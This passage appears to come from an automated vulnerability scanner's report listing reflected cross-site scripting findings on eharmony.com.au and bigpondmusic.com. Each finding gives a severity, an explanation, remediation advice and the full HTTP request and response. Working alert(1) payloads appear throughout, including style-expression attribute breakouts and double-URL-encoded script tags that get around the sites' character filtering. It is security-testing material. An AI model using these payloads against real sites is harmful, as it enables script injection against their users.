Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:26:59 GMT
Server: Apache/2.2.16 (Unix)
X-Powered-By: PHP/5.2.14
Set-Cookie: eh_aff_tracking=cid=55653228d2alert166a421fe9a4|aid=1000|pid=1000|ref=Dating; expires=Thu, 23-Dec-2010 03:26:59 GMT; path=/; domain=.eharmony.com.au
Cache-Control: max-age=900
Expires: Tue, 23 Nov 2010 03:41:59 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerFront=3893301676.16671.0000; path=/
Set-Cookie: lbid=6f56d95c-6f1b-4784-6f08-d36dfdd0c91b;expires=Sun, 22-May-2011 03:26:59 GMT;path=/;domain=.eharmony.com.au;
Content-Length: 37540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><!-- PAGE OK --><head><meta http-equ
...[SNIP]...
       s.prop1="";
                       s.prop2="";
                       s.prop3="";
                       s.prop4="";
                       s.prop5="";
                       s.prop25="";                        
                       s.prop31="";
                       s.prop32="";

                       /* cid,aid,pid,aff_id */
                       s.prop8="55653228d2";alert(1)//66a421fe9a4";
                       s.evar8="55653228d2";alert(1)//66a421fe9a4";

                       s.prop7="1000";
                       s.evar7="1000";

                       s.prop33="1000";
                       s.evar33="1000";

                       s.prop48="";
                       s.evar48="";

                       /* Conver
...[SNIP]...

2.3. http://bigpond.eharmony.com.au/ [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpond.eharmony.com.au
Path:   /

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b6e6"%3balert(1)//d81f9eceae8 was submitted in the pid parameter. This input was echoed as 5b6e6";alert(1)//d81f9eceae8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?cid=55653&aid=1000&pid=10005b6e6"%3balert(1)//d81f9eceae8&ref=Dating HTTP/1.1
Host: bigpond.eharmony.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:27:02 GMT
Server: Apache/2.2.16 (Unix)
X-Powered-By: PHP/5.2.14
Set-Cookie: eh_aff_tracking=cid=55653|aid=1000|pid=10005b6e6alert1d81f9eceae8|ref=Dating; expires=Thu, 23-Dec-2010 03:27:02 GMT; path=/; domain=.eharmony.com.au
Cache-Control: max-age=900
Expires: Tue, 23 Nov 2010 03:42:02 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerFront=3943633324.16671.0000; path=/
Set-Cookie: lbid=26761b98-9988-4033-50f8-4f5e01c879ab;expires=Sun, 22-May-2011 03:27:02 GMT;path=/;domain=.eharmony.com.au;
Content-Length: 37512

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><!-- PAGE OK --><head><meta http-equ
...[SNIP]...
s.prop25="";                        
                       s.prop31="";
                       s.prop32="";

                       /* cid,aid,pid,aff_id */
                       s.prop8="55653";
                       s.evar8="55653";

                       s.prop7="1000";
                       s.evar7="1000";

                       s.prop33="10005b6e6";alert(1)//d81f9eceae8";
                       s.evar33="10005b6e6";alert(1)//d81f9eceae8";

                       s.prop48="";
                       s.evar48="";

                       /* Conversion variables */
                       s.products="";
                       s.events="";
                       s.eVar1="";
                       s.eVar2=""
...[SNIP]...

2.4. http://bigpondmusic.com/ [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /

Issue detail

The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc97d"style%3d"x%3aexpression(alert(1))"3d602eff078 was submitted in the cid parameter. This input was echoed as cc97d"style="x:expression(alert(1))"3d602eff078 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?cid=bph-music-headcc97d"style%3d"x%3aexpression(alert(1))"3d602eff078 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:11:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 155790


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>BigPond Music - Music Downlo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/?cid=bph-music-headcc97d"style="x:expression(alert(1))"3d602eff078" />
...[SNIP]...

2.5. http://bigpondmusic.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7c8ab"style="x:expression(alert(1))"27f2f63ab70 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1 HTTP/1.1
Host: bigpondmusic.com
Proxy-Connection: keep-alive
Referer: http://www.telstraenterprise.com/Pages/Home.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Tue, 23 Nov 2010 02:44:20 GMT
Content-Length: 155765


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>BigPond Music - Music Downlo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/?7c8ab"style="x:expression(alert(1))"27f2f63ab70=1" />
...[SNIP]...

2.6. http://bigpondmusic.com/ [ref parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 704f3"style%3d"x%3aexpression(alert(1))"b95956680e9 was submitted in the ref parameter. This input was echoed as 704f3"style="x:expression(alert(1))"b95956680e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?ref=Net-Head-Music704f3"style%3d"x%3aexpression(alert(1))"b95956680e9 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:11:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 155783


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>BigPond Music - Music Downlo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/?ref=Net-Head-Music704f3"style="x:expression(alert(1))"b95956680e9" />
...[SNIP]...

2.7. http://bigpondmusic.com/100/70 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /100/70

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1a30'%3bd1138b1a62b was submitted in the REST URL parameter 1. This input was echoed as f1a30';d1138b1a62b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /100f1a30'%3bd1138b1a62b/70 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:29:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87872


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
lstrabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = '100f1a30';d1138b1a62b';
   s.prop4 = '70';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11 = 'N
...[SNIP]...

2.8. http://bigpondmusic.com/100/70 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /100/70

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2e6b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e32cac2f6a96 was submitted in the REST URL parameter 1. This input was echoed as d2e6b"><script>alert(1)</script>32cac2f6a96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /100d2e6b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e32cac2f6a96/70 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:29:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88199


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/100d2e6b"><script>alert(1)</script>32cac2f6a96/70" />
...[SNIP]...

2.9. http://bigpondmusic.com/100/70 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /100/70

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65295%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e803665935d5 was submitted in the REST URL parameter 2. This input was echoed as 65295"><script>alert(1)</script>803665935d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /100/7065295%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e803665935d5 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:29:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88311


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/100/7065295"><script>alert(1)</script>803665935d5" />
...[SNIP]...

2.10. http://bigpondmusic.com/100/70 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /100/70

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ccad'%3b8b45135ef4a was submitted in the REST URL parameter 2. This input was echoed as 4ccad';8b45135ef4a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /100/704ccad'%3b8b45135ef4a HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:29:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88005


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
calhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = '100';
   s.prop4 = '704ccad';8b45135ef4a';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11 = 'Non-Registered-Musi
...[SNIP]...

2.11. http://bigpondmusic.com/100/70 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /100/70

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b21f"style%3d"x%3aexpression(alert(1))"d5b1a6bf075 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2b21f"style="x:expression(alert(1))"d5b1a6bf075 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /100/70?2b21f"style%3d"x%3aexpression(alert(1))"d5b1a6bf075=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:29:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 163568


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Get the best 100 albums from
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/100/70?2b21f"style="x:expression(alert(1))"d5b1a6bf075=1" />
...[SNIP]...

2.12. http://bigpondmusic.com/100/80 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /100/80

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b20ec'%3bc7b5b48db1a was submitted in the REST URL parameter 1. This input was echoed as b20ec';c7b5b48db1a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /100b20ec'%3bc7b5b48db1a/80 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:30:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87780


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
lstrabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = '100b20ec';c7b5b48db1a';
   s.prop4 = '80';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11 = 'N
...[SNIP]...

2.13. http://bigpondmusic.com/100/80 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /100/80

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac9f7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee18865dec0f was submitted in the REST URL parameter 1. This input was echoed as ac9f7"><script>alert(1)</script>e18865dec0f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /100ac9f7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee18865dec0f/80 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:29:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88311


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/100ac9f7"><script>alert(1)</script>e18865dec0f/80" />
...[SNIP]...

2.14. http://bigpondmusic.com/100/80 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /100/80

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8469a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec4c8c7be166 was submitted in the REST URL parameter 2. This input was echoed as 8469a"><script>alert(1)</script>c4c8c7be166 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /100/808469a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec4c8c7be166 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
